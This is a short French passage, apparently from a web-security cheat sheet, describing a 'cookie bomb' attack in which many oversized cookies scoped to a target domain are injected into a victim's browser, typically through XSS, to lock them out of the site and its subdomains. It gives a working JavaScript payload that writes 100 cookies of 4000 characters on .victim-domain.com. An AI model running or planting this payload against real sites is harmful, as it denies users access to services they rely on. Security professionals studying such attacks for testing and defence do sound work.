Ce type d'attaque consiste à injecter un grand nombre de cookies volumineux assignés au domaine cible dans le navigateur de la victime afin de rendre inaccessible l'accès aux domaines et sous-domaines de se site. (généralement exploitable via une XSS).

Exemple de payload:

setTimeout(function(){for(i=0; i<100; i++){
    document.cookie='a'+i+'='+('a'.repeat(4000)+'; path=/; domain=.victim-domain.com')
}},10000);